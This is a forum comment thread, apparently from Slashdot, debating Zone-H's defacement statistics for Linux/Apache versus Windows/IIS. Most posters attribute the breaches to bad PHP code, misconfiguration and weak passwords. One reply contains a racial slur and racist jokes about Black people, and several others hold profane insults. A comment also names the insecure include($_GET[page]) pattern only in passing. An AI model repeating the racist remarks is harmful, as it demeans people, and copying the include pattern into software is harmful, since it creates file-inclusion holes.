I would guess that this was more likely a script-kiddie running some scanner tool trying to make use of a vulnerability in a PHP application (PHPBB, Mambo, Drupal, etc.)

In order for the attack to work, you'd have to enable the allow_url_include option, which is off by default http://www.php.net/manual/en/ref.filesystem.php#ini.allow-url-include. It would probably also need register_globals enabled, which is off by default as of PHP 4.3 (I think 4.3, it started being off in version 4). I think that allow_url_fopen allowed this behavior in PHP 4.3 http://phpsec.org/.

It's unfortunate that there aren't more decent PHP programmers. I suppose it's true of any language. You have to start somewhere.

Re:!Apache, but PHP

[MrMunkey]

I previewed this several times and completely forgot to put in my point about the article. I wouldn't say that defacements can be "blamed" on the OS, or probably even the web server (at least most of them). Bad PHP/JSP/ASP/Ruby scripts can all be taken advantage of if the web app is written poorly and/or insecurely

Re:!Apache, but PHP

[loconet]

Exactly. The article is misleading. If you look at the breakdown by methods of intrusion you will see that the great majority of top reasons are actually related to application bugs and misconfiguration rather than the web server itself. Very little can be done about that and the fact that Apache is the dominant web server only adds to the numbers:

Attack against the administrator/user (password stealing/sniffing)  48.006       207.323         141.660
Shares misconfiguration                                             39.020        36.529          67.437
File Inclusion                                                     118.395       148.082          61.011
SQL Injection                                                       36.253        47.212          35.407
Access credentials through Man In the Middle attack                 20.427        21.209          28.046
Other Web Application bug                                           50.383         6.529          18.048

Re:!Apache, but PHP

[Foofoobar]

Cant agree more. Bad PHP scripts are the core issue with most of the problems of this nature over the years and now the author is using spurios logic to try and state that it is Apache and Linux's fault that people can't program PHP well.

percentage?

[RiotingPacifist]

Does apache still have a larger market share? the pure numbers are meaningless without market share info. That said even market share info is meaningless as its always going to be easier to hack a full website (especially those with user content, like forums) rather than a parking website (which ive heard account for a lot of IIS websites) or a single page hosting some stupid flash/silverlight stuff.

famous quote

[wwmedia]

"98% of all statistics are made up"

Re:famous quote

[El_Muerte_TDS]

That's not true, a recent study has shown it was only 63% of all statistics.

Re:famous quote

And what about the remaining 16%?

Re:famous quote

Turns out they made it look like 63 per cent. It actually was 113 per cent.

Re:famous quote

[OMNIpotusCOM]

God damnit! It's not the statistics, it's the scripts running on calculators that people are getting the statistics from. Either that or noob calculator admins. Check your paper tape people! How many times do I have to say that? I keep my calculator in a safe (of course changing the combination to said safe 3 times a week), buried in a forrest.

And most successful attacks....

[SCHecklerX]

Are due to the 'programmer'/'sysadmin' not knowing wtf they are doing. SQL injection, Methods other than get/post, exposed admin pages, etc. This stuff, in my experience, is rarely a problem with the OS or web server itself, so these statistics are somewhat pointless.

Summary skewed.

[Lumpy]

Of course Apache and linux have more attacks than windows.

There are far more honda civics successfully stolen in the USA than BMW Isetta's Or Smart TwoFours This is because there are well over 5000 civics on the road for every BMW Isetta or Smart TwoFour on the road.

By the summary's mention and what it is alluding to, BeOS servers are the most secure because NONE of them have been compromised on the internet.

Re:Summary skewed.

Of course blacks commit more crime than whites!

There are far .. uh, fewer blacks. You mean they're a minority of the population, yet they commit the most crime? Oh. What a bunch of niggers.

Why don't little black kids ever play in sandboxes? The cats keep trying to bury them!

Re:Summary skewed.

[Shino]

Right, and left-hander live longer because statistically less left-hander die in a year than right-hander...

Re:Summary skewed.

[Yvan256]

Wow! I have to become left-handed ASAP then!

Re:Summary skewed.

[Macthorpe]

I hate to echo what someone else said earlier, but this is exactly the argument that's been put forward for years by Windows users as to why Windows is such a popular target for malware writers. That opinion has come up against some incredibly strong opposition from a good portion of the Slashdot crowd.

Now that the shoe is on the other foot, so to speak, apparently having a larger marketshare is significant. I will find it very interesting to see who puts their hands up and admits that such exploits are mostly OS-neutral.

Re:Summary skewed.

[aesiamun]

I can almost guarantee you, most web site exploits are exploits that involve the application, not the server.

So yeah, OS-neutral. PHP is OS neutral and so is ASP. I've seen crappy applications written in each.

Re:Summary skewed.

[db32]

Funny how this is a one way argument. When MS users try to use this line of logic it gets torn to ribbons, when an OSS supporter uses the same it gets +5 Interesting

Re:Summary skewed.

This is also one more survey where Tomcat is counted as Apache, probably only because the Server: response header starts with "Apache" (the full string says "Apache Coyote", which is Tomcat's built-in web server). It's not the Apache web server though, and shouldn't be counted as the Apache web server.

Re:Summary skewed.

Call me when you can infect a Linux,BSD,or OSX machine with one click ffrom a user account.

windows SUCKS because you run as fucking ADMIN.. meybe if you dumb Windows users had a clue as to how operating systems work, you would understand.

Re:Summary skewed.

[spitzak]

The problem is that in this case it is the *same* attacks on both platforms (mostly guessing or brute-forcing the password so that new pages can be uploaded). Thus the percentages on each platform almost exactly match the installed base percentages, in fact if they were different then the whole thing would be suspect.

The same thing is becoming increasingly true for malware on desktop machines.

The most common method of invading a machine is to fool the user into clicking on a download, and in this case I would expect the same number of people to be fooled when running either Windows or Linux (assumming the same level of intelligence and experience and insight, all of which is increasingly irrelevant as people buy preinstalled Linux machines). Now the fact that the malware won't work on Linux is 100% (alright maybe 99%) due to Windows larger market share (it is quite obvious that a Linux malware can send email and damage users files and install itself so it starts up when X starts up, even if it never gets root access. Linux's main advantage technically is the variation in the systems at the accessible exploit level, the same thing that makes it a pain to install non-repository software also protects against malware).

I believe if you added up all the downloaded files (whether the malware was stopped because it was run on Linux, or due to UAC, or conversely it did run on Linux because it ran using Wine) then the percentages would get really close to the installed bases of Windows and Linux.

I get thousands of ssh attempted logins an hour so Linux is certainly being targeting. My impression is though that both Windows and Linux are far, far better than they used to be for anything happening without the user doing something stupid. Even if Windows is a hundred times worse, direct attacks are so small compared to the stupid-user problem that the difference here disappears into the noise. With scripting I expect portable attacks to be possible and in that case I would expect to see matching percentages between Linux and Windows for sources of malware.

Re:Summary skewed.

I *love* how now that Linux is picking up in popularity with the general public and there are all this "issues" that are found that the Linux crowd turns into massive hypocrites.

"Well there are more Linux servers so no wonder more Linux servers were defaced."

"It's the user's fault, check your configuration!"

"Can't fix stupid users."

All of these are arguments Windows advocates used, and were told were invalid arguments by Linux advocates. Most "problems" with Windows can be defended with the same arguments. There are a few real flaws in several versions of Windows, but contrary to popular belief you can lock down a Windows box just about as securely as a Linux one all thanks to the GPO.

But come on guys. How many times have things like virus' been explainable because if you're going to write malicious code, you want it to work on as much stuff as possible and Windows was number one?

Or how many systems were brought down because some sysadmin didn't lockout something, or otherwise change a setting for security reasons (re-naming the Administrator account to something besides "admin" could be a good idea...)?

Or how many Windows domains were vandalized because some moron has their user ID and pass on a sticky note on the monitor?

I'm sure this is only the beginning. As Linux grows in popularity (finally; thanks MicroSoft!) more issues that were critical of Windows will happen on Linux. Some mind you. We all know there are some issues with various versions of Windows.

Just remember, the human element is *usually* the real issue not the technology. This article helps support that, IIS is apparently just as strong as Apache. Or the other way, Apache is just as weak as IIS.

And I say this as a Linux & Windows user. Never throw out a useful tool . . .

Re:Summary skewed.

"There are far more honda civics successfully stolen in the USA than BMW Isetta's Or Smart TwoFours This is because there are well over 5000 civics on the road for every BMW Isetta or Smart TwoFour on the road." - by Lumpy (12016) on Saturday March 15, @10:09AM (#22759304) Homepage Well, then given THAT little tidbit from you? Why is it then, that whenever Windows gets attacked (via whatever machinations), "it's NOT OK for Windows users to use that same rationale you are using"?

Hmmm??

There are far, FAR more Windows NT-based OS setups period (from home/work desktops, to departmental servers, up thru "enterprise class/mission critical" Back Office server style setups on this planet than there are Linux (*nix in general in fact), this is just a known fact.

----

"Of course Apache and linux have more attacks than windows." - by Lumpy (12016) on Saturday March 15, @10:09AM (#22759304) Homepage Can't argue with that.

Re:Summary skewed.

> The most common method of invading a machine is to fool the user into clicking on a download, and in this case I would expect the same number of people to be fooled when running either Windows or Linux

There is one little flaw though: How often have you downloaded some (unsigned or signed by someone you do not know quite sure you can trust) binary package (well, actually include sources as well if you want) under Linux and how often under Windows?
I think it is something like 1:10. If in the future using the distro repositories to download signed packages remains the default install method, it also will stay harder to infect Linux this way - esp. since most Linux users will not even know how to run the downloaded file without extra instructions.

Re:Summary skewed.

[Bungie]

windows SUCKS because you run as fucking ADMIN.. meybe if you dumb Windows users had a clue as to how operating systems work, you would understand

Well hopefully your SERVICES will be running under another process account. Especially if they are some sort of NETWORK SERVICE. It's almost like they should have some sort of "Windows Firewall" warning when you have to run services from ADMIN and start to open ports. I wish I could just press F1 and somehow get some HELP with my privilege escalation problems. Even worse the 'Configure Your Server Wizard' windows is always in the way when I want to double click more server processes from my desktop!

I guess I don't know a lot about operating systems but I recommend you buy Norton Firewall and give up running your Windows server. It might be too insecure for some kinds of people.

Re:Summary skewed.

[db32]

He didn't leave a number, but there are plenty of ways to infect those machines with one click, they are called exploits. Local are even more common than remote, and no OS to date has exactly been safe from that. Other than that, you might also point out that the only Windows OS that makes you run as "fucking ADMIN" are the home versions. So, I am going to go out on a limb and guess this guy has never worked in a real environment because you will pretty much have to support some Windows boxes regardless of your home OS. So...I will correct you in that you should not explain all of this stuff, rather, your response should have been "Leave your mother's basement, get a job, and quit using pirated versions of the home variants of Windows so you can get a clue". That is all :)

Linux X Windows??

[piojo]

Was anybody else really confused for a second when they read the headline "Linux X Windows"? What does this article have to do with X-Windows? Then I realized they meant "versus".

Re:Linux X Windows??

[RiotingPacifist]

i thought it was the vector product of linux and windows! when they finally include bsd do they get the volume of a the Internets?

Re:Linux X Windows??

I was really confused by your comment in light of the fact that the fucking headline does not say "Linux X Windows" you moron. What the fuck drugs are you on dude?

Re:Linux X Windows??

[DAldredge]

Their is no such thing as "X-Windows"

Re:Linux X Windows??

[fastest+fascist]

The moron read the article. Big mistake, obviously.

Re:Linux X Windows??

[piojo]

Their is no such thing as "X-Windows" The two million results for this search would disagree.

Re:Linux X Windows??

[bvankuik]

That's right, finally someone else that acknowledges my pet peeve! It's either 'X' or 'the X Window System'. Strangely, whenever I pedantically mention this, I get modded down!

Re:Linux X Windows??

[msuarezalvarez]

What's strange, really, is that you find it strange...

Why is it that I think this website security ....

[3seas]

...issue is more serious than it really needs to be?

Using regular backup methods and unauthorized access alarms (access alarms that are either verified or not as a matter of access notification loops).
So when a site gets hacked there is timely notification and backup usage.

In other words, should access happen but not getting verification within a set amount of time, reverts back to the pre-unverified access state of the site.

perhaps we can write this in PHP or python?

Good riddance

I've been reading Zone-H for years, and I've rarely read anything interesting there. It mostly seems to just be a rehash of what other sites tell (and this halfway entertaining - but mostly useless - hacking archive). However, they often imply that other peoples works is theirs.

In this article, you can see again their idiotic claims of grandiose:

For example, we were the first in the world to forecast (and to demonstrate):

- the fact that the world of hacking was moving toward web application techniques
- the fact that the ancient Windows vs. Linux war was absolutely a waste of time and words
- the fact that politically motivated incidents would have become very common
- the raise of the Muslim hacking world.
- the disappearance of the Brazilians from the deface scene and their transformation in more dangerous cyber-criminals (spammers, scammers, carders)
- the use of the Internet for PsyOp scopes
- the fact that 3rd generations mobile phones worst threats were not coming from viruses, but at application level.
- the extensive cyber-espionnage activities of China
- the arrival of cyber-wars big enough to paralyze a country
- the anticipation of embedded spyware at hardware level

I don't think I'll miss much about Zone-H

the story smells

[tasinet.gr]

So, Apache, with a larger market share (66%, ?) has been the server serving the application which was hacked/defaced. That is news how? For example when facebook was broken into and the private images downloaded and put up on torrents, Apache was probably serving the files but not the vulnerable point!

Lets look at it this way, if there is such a wave of defacements, how come whitehouse.gov which runs linux/freebsd and Apache, how come they arent getting defaced? Because someone serious took the time to configure the damn server properly. How hard is that? google->hardening apache. then use common sense when handling input in your applications/scripts.

facebook@netcraft Apache/1.3.37.fb1
".fb1"? how customised do you suppose fb1 is? If it were defaced, would it be apache's fault, a 0day exploit perhaps, or due to the configuration (or "fb1" whatever that means, if anything)?

Lies, sorry

They list Linux as a single summary, but Windows 2003, 2000, XP, etc are all broken down by version. To be fair, either Linux needs to be broken down by distro/kernel, or they need to lump all windows into one category. if you lump windows into one category, its easily TWO TO THREE TIMES greater than Linux.

There are Lies, Damn Lies, and Statistics.

Re:Lies, sorry

[Macthorpe]

if you lump windows into one category, its easily TWO TO THREE TIMES greater than Linux. I was going to say "I don't want to be rude", but I'm actually okay with it. Bearing that in mind...

What the fuck are you talking about?

Linux - 306,076
All Windows combined - 139,503

Did you accidentally smash your head in with a frying pan while you were adding things together?

Bad PHP Scripts

[Foofoobar]

This report draws poor conclusions and blames the OS and the server for badly written PHP apps. Badly written PHP apps have been the bane of the LAWP community and now this is haw they make Linux look bad. This is just another FUD attack.

When in doubt

[iminplaya]

Kill the messenger!

Luxury!

[JoeCommodore]

Heck, I do all that too, AND not only that, I create the content on the site I also keep it off-line (through local host, don't want to open up those vulnerable external connections) and am the only visitor in order to ensure that the user base is completely trustworthy.

The necessity to change every three hours the three - 127 character passwords with mandatory 'No more than two letters/numbers/symbols together' rule does make memorization a tad challenging.

Re:Why is it that I think this website security ..

[Nitemare14]

Probably can be written in PHP or python. But the way I see it, the scripts themselves are the vulnerabilities in most websites. So if they can hack a site using script vulnerabilities, what's to stop them from hacking this script as well?

Here are (very simple) ratio adjusted numbers

[GeekBoy]

Taking the posted ratio of 66% Apache (assuming all Linux, which I know is not true) to 23% IIS that means that:
There are 2.869 times as many Apache installations as IIS. Windows is reported with 139,503 defacements. Linux is reported with 306,076 defacements.
If we scale the Windows defacements by the ratio of Apache/IIS we get: Windows scaled: 400,313 (rounded up) defacements Linux (raw): 306,076 defacements
Draw your own conclusions. (Realizing that this is flawed and meaningless.)

Re:Here are (very simple) ratio adjusted numbers

[Macthorpe]

Apache now only serves 50.93% of all websites (Netcraft confirms it!) compared to IIS's 35.56%. That would put the ratio at 1.43, and therefore your scaled defacements on Windows using the same calculationss would be 199,800, still 100,000 lower than defacements on Linux.

Also, Apache works on Unix, FreeBSD, Solaris, Novell NetWare, and Mac OS X as well as Linux and Windows. That further skews the figures, but not in a known direction.

this is flawed and meaningless. Pretty much, yeah.

Numbers!

[TerranFury]

The article says that there were 1,485,280 Apache defacements and 815,119 IIS defacements. This implies a total of 2,300,399 samples, of which 64.6% were Linux. For comparison, other posters here have cited a Google survey reporting that 60% of webservers run Apache. That would seem to imply that, if you pick an IIS server at random or an Apache server at random, each is about as likely to be successfully attacked as the other.

Conclusion: IIS is just as good as Apache (contrary to popular Slashdot opinion). Of course, there's a flip side: Apache is just as good as IIS -- and it's free.

[Take all this modulo the fact that 370% of statistics are, if not made up on the spot, at least full of so much noise as to be meaningless. (Sometimes the Law of Large Numbers really does require large numbers!]

Re:Numbers!

"Of course, there's a flip side: Apache is just as good as IIS -- and it's free."

Of course, also take into account: IIS is much easier to setup

Re:Numbers!

[CastrTroy]

Also, a lot of people running Apache are newbs who don't know what they are doing, and using it just because it's free, or because it came with their ultra cheap hosting account. The page got defaced, not because of apache, but because they are noobs, and left SQL injection holes all over the place. How many of these defacements are due to bugs with Apache, as compared to defacements facilitated by people putting apps up on the web who didn't know what they were doing?

Re:Numbers!

[The+Spoonman]

Of course, also take into account: IIS is much easier to setup

And thus, secure. Your typical httpd.conf from a distro is a thousand lines. Most of them are comments, and half-assed attempts at documentation, but rarely useful unless you already know what you're doing. How many of those config lines are actually necessary to setup an Apache web server to get bare-minimum configuration? With IIS, it's easy: uncheck the ones you don't want, then go through the checklist provided by MS. A locked-down, secure, yet STILL USABLE IIS server can be setup in 10 minutes with someone with even a modicum of a clue. Apache..not so much. If it's a new distro, that 10 minutes will typically be spent just trying to find the httpd.conf because it could be anywhere (yes, I know "slocate httpd.conf", I was making a point).

Re:Numbers!

[TheRaven64]

Probably the more important conclusion is that most web server exploits have nothing at all to do with which web server you are running. If the exploit is in your PHP app, then neither Apache nor IIS on Linux or Windows will protect you. The entire stack has to be secure for the platform to be secure. Holes in the operating system, web server, web app, or web app framework can all cause problems. Some of these can be mitigated, for example by running the web server in a chroot environment that it doesn't have write access to, but this just limits the damage an attacker can do (they can still connect to the database and steal all of the user information, for example). The take-home message from this report seems to be that people are running the same insecure crap on their web servers whatever the underlying platform is.

Re:Numbers!

[msuarezalvarez]

If it's a new distro, that 10 minutes will typically be spent just trying to find the httpd.conf because it could be anywhere (yes, I know "slocate httpd.conf", I was making a point).

If the distro is so new to you that you do not know where the httpd.conf file is located, then you should probably not be setting up a internet-facing web server on it...

Re:Numbers!

[The+Spoonman]

I knew it was too subtle.

Re:Numbers!

No, the real conclusion is that the choice of http *server* will, most of the time, be irrelevant. When was the last time you heard someone break into a website using a hole in Apache (or IIS, or whatever) *as such*?

Most of the time, the holes exploited are in a vulnerable application running on top of it. Comparing how often different http servers get broken into is interesting, of course, but not any more meaningful than asking whether buffer overflows are more common among applications compiled with, say, GCC or Intel's compiler. There might be a few cases where the compiler itself generates wrong code and causes buffer overflows, but usually, that won't matter.

Re:Numbers!

[msuarezalvarez]

It was not too subtle, it was simply a silly point, amounting to the statement ``I do not know the tool and I am surprised that it does not work well when I use it''.

Re:Numbers!

[The+Spoonman]

The point about the location of the config file was secondary to the point that there's no consistency in Linux, which results in a lot of new admins having trouble configuring things properly. OTOH, anyone who's setup an IIS box knows where everything is because it's always in the same location.

Re:Numbers!

[msuarezalvarez]

Why would there be more consistency across linux distros than say, from a Windows install to a Mac install? In the many years I have been using linux (on two distros) I have exactly once had to hunt for a config file that had moved from where it was in the same distro in an earlier version; I'd hope that IIS has not moved its config files much across different versions, but I'd be very surprised if it had consistently put them in the same place as apache does...

Re:Numbers!

[caluml]

the point that there's no consistency in Linux, Perhaps that's because it can be installed multiple times on the same machine, in different directories, running as different users (yes, I know about suexec, etc). Wonder what would happen if you wanted to have 3 different installations of IIS running on the same machine on different ports? (Different installs, not merely vhosts.)

Re:Numbers!

[The+Spoonman]

In the many years I have been using linux (on two distros)

Wow, two whole distros?

but I'd be very surprised if it had consistently put them in the same place as apache does

Well, that's the thing: Apache doesn't place it, the distro maintainer does. Some put it in /etc, some in /etc/apache/conf, some in /etc/apache2/conf, some in /etc/httpd, some in /etc/httpd/conf, some in /usr/etc, some in /usr/local/etc, some in....

Re:Numbers!

[The+Spoonman]

Well, you wouldn't install multiple versions of IIS on a non-dev machine because that would be stupid. However, if you had three different sites running, on different ports, they'd all be configured from the same locaiton.

Re:Numbers!

[caluml]

Well, you wouldn't install multiple versions of IIS on a non-dev machine because that would be stupid. So, because you can't think of reasons it would be useful, it's "stupid". Fair enough.

Re:Numbers!

[The+Spoonman]

No, it's stupid because having such an kludge on a web-facing server is stupid. There are rules you follow, and just because you can think of a reason to violate them doesn't make them less stupid...just rationalized.

Interesting

[magamiako1]

You know it comes across as interesting that whenever statistics come out that show that "Windows had more worms and viruses this year than Linux or MacOSX!" people use that as fuel to the fire to continually denounce Windows as a bad platform, Microsoft is the devil, Microsoft is evil, and any other number of ways of putting down Windows to make themselves feel better.

Then a statistic that comes out that shows Linux/Apache at the top of a security vulnerability list, and it's immediately "Oh it's the users! They don't know how to implement the platform properly! It's the scripting language they used! These numbers are meaningless without marketshare values!"

What we have as facts when it comes to security vulnerabilities:

1. When more people use it, there is a tendency to have more security vulnerabilities since more eyes are scrutinizing what is or isn't possible with that platform.

2. No matter which platform, it is only as secure as the person's implementation. If they don't know how to configure the system properly, it doesn't matter in the end.

So why all the hate against Microsoft for their products if these same problems affect all platforms?

Re:Interesting

[shoor]

Speaking for myself, hatred of Microsoft has to do with them being a monopolistic bully, not the quality of their products.

Re:Interesting

[UnknowingFool]

You know it comes across as interesting that whenever statistics come out that show that "Windows had more worms and viruses this year than Linux or MacOSX!" people use that as fuel to the fire to continually denounce Windows as a bad platform, Microsoft is the devil, Microsoft is evil, and any other number of ways of putting down Windows to make themselves feel better.

Whose fault is it that Windows architecture suffers from viruses and worms. Microsoft and only Microsoft. Whose fault is it that an Apache webserver is successfully defaced. The answer is depends. Because you don't know what was vulnerable. Was perl, PHP, or even the OS? Remember Apache runs on Windows too. On the portion that lists Apache being at the top, it didn't say Apache/Linux. It's just Apache. It could have been Apache/Win, Apache/OS X, etc.

Seriously this statistics reports is not very useable in a few regards.

1) It is a sampling based on voluntary submissions. It only looks at reported defacements. That makes the numbers unreliable as some companies/individuals don't bother to report for a number of reasons. One could argue that Linux and Apache users are more open to sharing this information but the better argument is that unless there is 100% reporting, no one can really vouch for the accuracy compared to real world conditions.

2) It doesn't weigh the number of defacements with the number of servers. It looks at the nominal defacements and not the weighted defacements. Or at least it doesn't mention using weights. That's like saying Duluth, Minnesota (pop. 86,000) is more dangerous than Aitkin, Minnesota (pop. 1,984) because it had more serious crimes reported. You would expect Duluth to have nominally more serious crimes in Duluth than Aitkin because Duluth is 40x bigger. Per capita crime is a better measure.

3) It lumps all Apache into one bin, yet separates IIS into different versions. It appears to me that if they lumped all IIS defacements, it would be larger than Apache.

Re:Interesting

It's simply because SLASHDOT is largely populated by "Pro-*NIX" jackasses that are most likely upset @ themselves for choosing the lesser used & thus, less jobs possible exist for they, OS platform... so, they TRY to "cut-down" Windows any way they can. You know this, but, I thought I'd cut thru the crap & state it for you, in plain english & NO "subtle" messages/subtleties.

Re:Interesting

[magamiako1]

Whose fault is it that Windows architecture suffers from viruses and worms. Microsoft and only Microsoft. Whose fault is it that an Apache webserver is successfully defaced. The answer is depends. Because you don't know what was vulnerable. Was perl, PHP, or even the OS? Remember Apache runs on Windows too. On the portion that lists Apache being at the top, it didn't say Apache/Linux. It's just Apache. It could have been Apache/Win, Apache/OS X, etc. Actually, the list specifically lists Linux at being the top of the list. You don't compare "Apache" to Windows. You compare Apache to "IIS". It reports that Linux was the OS of choice at the top of website defacements for 2007. Your comments are precisely what I was targetting with my response.

Microsoft and only Microsoft Not true. There are many implementation details that come across as users. You do not have to operate a service under a system account security context anymore than you have to run a process as root in Linux. While it is default for Windows services to operate as such, it is configurable by the user otherwise by checking the service properties. You fail to make an argument that counters precisely what I said, you only fuel the reason I stated it.

While I agree with the thrust of the comments...

[HerculesMO]

I have to kind of sit back and laugh, since the defense to Apache/Linux comes in the form of "bad scripting" or other holes created by poor admin skills.

And I totally agree.

Then why do we always sit here and blast Windows and Microsoft, when in fact good admins keep their boxes running with an optimal uptime, performance, etc? I will agree with the 95/98/ME era, but coming into XP and 2003 Server, I think that it comes down to the skill of the admin to eek out the performance out of the Windows boxes rather than to expect it like most people here do. It seems quite hypocritical to me, but hey.. I'll probably be modded down for coming to a logical argument that might cast Microsoft in a positive light. I'm not a zealot, but I've seen both sides of the coin and I know that Windows boxes can be stable and bulletproof, if you have a good admin. And those admins get blue screens -- when hardware fails. I don't know what happens in Linux, but last I checked it doesn't deal with a bad RAM chip any better than Windows does.

Just food for thought.

More apache, more linux - function brings danger

[dindi]

Well,
When you allow larger flexibility of doing things, you open doors.

PHP allows you to do ANYthing, including remote includes and relative and absolute includes (../whatever.php or /etc/passwd), while ASP is a pain in the back with these things ( include($variable) in ASP?? )

What I am trying to say, is that I am 90 percent sure, most of the defacements came from badly written code, such as index.php?news=page.php, and the include($_GET[page] kind of ignorant coding. Did I do that unthinkingly? OH yes. Everyone does, but then you learn.

Same with linux. Many people I know have servers with ssh and FTP enabled with super safe passes:

My favourite :
Company name: Heartless Buthcers LTD
Login: Heartless
pass: Butchers

Also I write a script in 5 minutes that logs into remote systems that do this and that with scripting, but I am in trouble doing anything on a remote access login to a gui, which is hardly scriptable (OK maybe that is my lack of knowledge of Wintel systems.

Just my 2 cents: with flexibility you open doors, and I think that is where it all boils down in this case.

Except that IIS is at 35% and Apache at 50%

[mverwijs]

Last I checked, IIS was at about 35% and Apache at 50%.

  --> http://news.netcraft.com/archives/2008/02/06/february_2008_web_server_survey.html

Of course, these are just statistics...

-mverwijs

Yeah, yeah, yeah, wrong.

[Erris]

I don't like the blame the user excuse, but that is what is being reported. If you scroll down to the Attack method, you see "Attack against the administrator/user (password stealing/sniffing)" is the overwhelming favorite.

This almost makes sense, but I don't trust the site much. Besides the blatant idiocy of implying a platform with known auto-root problems is more secure than one that lacks those problems, their numbers and headings are filled with inconsistencies. Sometimes they use a decimal point to represent 10^3 divisions and sometimes they don't use anything. Headings appear to duplicate each other, like the "Remote service password guessing" and "Remote service password bruteforce" while others need to be broken out. Finally, there are dozens of exploits "patched" each month for Windows but none of these technical problems shows up in their charts - only common problems are categorized. Is patch Tuesday a farce or are the fixes real and the problems worth tracking? Overall, this looks like another "get the facts" moment.

This article belongs in the "Something to keep thinking about until it falls completely apart" department.

Re:Yeah, yeah, yeah, wrong.

[Macthorpe]

I don't like the blame the user excuse, but that is what is being reported. Read this as: "I always deny the 'Blame the user' excuse when it's Windows, but seeing as it's Linux that has the problem here I'm willing to change my mind."

Sometimes they use a decimal point to represent 10^3 divisions and sometimes they don't use anything. I only see one instance of this (NOYB, 2006, '1308' instead of '1.308') but I'm sure you can tell us how this completely destroys their credibility.

Headings appear to duplicate each other, like the "Remote service password guessing" and "Remote service password bruteforce" You'd be right if they were the same thing, but they're not.

Finally, there are dozens of exploits "patched" each month for Windows but none of these technical problems shows up in their charts - only common problems are categorized. Is patch Tuesday a farce or are the fixes real and the problems worth tracking? It's not an exploit count, it's a log of all incidents where websites were attacked successfully. I'll let you go and find an exploit count for IIS 6.0 and Apache 2.2 yourself (I'll give you a hint though, you won't like the numbers).

Re:Yeah, yeah, yeah, wrong.

[hedwards]

Read this as: "I always deny the 'Blame the user' excuse when it's Windows, but seeing as it's Linux that has the problem here I'm willing to change my mind." Like many things there's an element of truth to the assumption that Windows has more users worthy of blame than most OSes other than possibly OSX. But in my mind, there should be a rule out of an actual bug or more sophisticated attack before concluding that it was user error. Mostly because if you're wrong about it, then there's only 1 account vulnerable, whereas if you are right, then there's an exploit that's likely in need of a fix.

I only see one instance of this (NOYB, 2006, '1308' instead of '1.308') but I'm sure you can tell us how this completely destroys their credibility. Putting just a blank space would've been a great improvement for those of us that are accustomed to using commas there. I had a difficult time figuring out which it was until I found a number which had 2 decimal points in it.

On a side note, why do some people use commas to delimit sets of 10^3 and others use decimal points? And moreover which one is more correct, localization issues not withstanding?

Re:Yeah, yeah, yeah, wrong.

[that+this+is+not+und]

Like many things there's an element of truth to the assumption that Windows has more users worthy of blame than most OSes other than possibly OSX.

Except we're discussing servers here, and rather than 'users' it is presumably 'admins' being counted.

Re:Yeah, yeah, yeah, wrong.

Ignorant cunt.

Re:Yeah, yeah, yeah, wrong.

[gr8scot]

Sometimes they use a decimal point to represent 10^3 divisions and sometimes they don't use anything. I only see one instance of this (NOYB, 2006, '1308' instead of '1.308') but I'm sure you can tell us how this completely destroys their credibility. Suppose it had been academic work. How would you, as the student presenting such work, explain the inconsistency in presentation of the alleged "data" summary? Where are the raw, unsummarized data? How could we verify the "report" with a neutral third party?

Headings appear to duplicate each other, like the "Remote service password guessing" and "Remote service password bruteforce" You'd be right if they were the same thing, but they're not. "Brute force" is certainly a subset of "password guessing." It's also usually the largest, and in many cases the only subset. So, what's the difference, really? And just to be complete, what's the real difference?

Re:Yeah, yeah, yeah, wrong.

[something_wicked_thi]

Why are you even bothering to argue this? The data doesn't tell us anything about Linux vs. Windows security. Just look at the top 5 methods by which the defacement happened:

1. Attack against the administrator/user (password stealing/sniffing): 141.660
2. Shares misconfiguration: 67.437
3. File Inclusion: 61.011
4. SQL Injection: 35.407
5. Access credentials through Man In the Middle attack: 28.046

(Those are the 2007 numbers)

That's a total of 333,561 total intrusions, and not one of those is due to inherent insecurity in anything. They are all configuration problems or bugs in the web apps themselves. And that's about 70% of the intrusions. Plus, many of the other attack vectors were of the same class. Only 13,405 were "web server intrusions" which is about 3%. If you take "RPC Server Intrusion" and "Other server intrusion" together as platform bugs (and I'm guessing most aren't), then you still only end up with another 3%.

Therefore, all this story tells us is that the software industry has to do a lot of work to protect users from themselves. It doesn't tell us that Apache or IIS or Windows or Linux is more secure than something else. It tells us users suck at security and programmers suck at making security simple.

Re:Yeah, yeah, yeah, wrong.

[jc42]

... It doesn't tell us that Apache or IIS or Windows or Linux is more secure than something else. It tells us users suck at security and programmers suck at making security simple.

True, perhaps. But what it also tells me is that regardless of OS, the software's documentation sucks, especially on security issues. While it may be true that there are lots of idiot users who'll never learn, I think most of us here have also found themselves frustrated by the sorry state of the documentation on their favorite system. I know, as a longtime unix/linux user, I agree fully with the ongoing criticism of the sketchy nature of much of the documentation. Much of what I know, I learned by experimenting, or by asking others who have learned by experimenting. Sometimes, I've also dug into the source code, which is more possible on linux systems than on others, but that's difficult and time consuming, and also doesn't usually lead to full understanding.

As long as software producers insist on keeping their users ignorant of how to use the software correctly, you can't fully blame the users for their ignorance.

Security is especially a problem. I learned the hard way that, if you ask security questions, you tend to rapidly get a "hacker" reputation. So it's common to not pry too deeply into security, but to rather sit at the side and try to learn by osmosis. This is not especially effective. But in most organizations, it's safer for your professional reputation if you don't become known as the one who's constantly prying into security issues.

I'd say that a great deal of users' ignorance of security issues is due to a combination of the general refusal to fully document security issues, and the punishment brought down on users who try too openly to learn about security.

That, and the idiocy of a large fraction of the users, of course.

Re:Yeah, yeah, yeah, wrong.

[jc42]

On a side note, why do some people use commas to delimit sets of 10^3 and others use decimal points? And moreover which one is more correct, localization issues not withstanding?

If the author is in North America, the comma is correct. If the author is in Europe, the period is (mostly) correct.

And, of course, if you're the reader, you usually can't know where the author was, so you have no clue.

Ain't standards wonderful? The phrase "divided by a common language" comes to mind.

(And if you do figure out a reliable solution to this puzzle, your next task is to find a reliable way to decode dates and convert them to the ISO standard date format. Start with "What date is 2/4/6?" If you solve that one, you can advance to the next puzzle: figuring out the time zone of the writer. ;-)

Re:Yeah, yeah, yeah, wrong.

[epine]

Canadians enjoy a particularly severe strain of dating schizophrenia. I have discovered a good solution to the 2/4/6 problem. Avoid doing transactions on any day less than the current month and during any month less than the current year.

Of course, in 2012 I'll have to compress my yearly shopping between December 12 and December 31. Hopefully nobody else figures this out, so the stores won't be too crowded.

Re:Yeah, yeah, yeah, wrong.

I always write year/month/day and use 4 numbers for the year. This gives 2006/02/04 or 2006/04/02 depending. I first learned the D/M/Y then switch to M/D/Y. They are ambiguous and don't sort easily. Using YYYY/MM/DD is unambiguous; I've never seen or heard of anybody using Y/D/M.

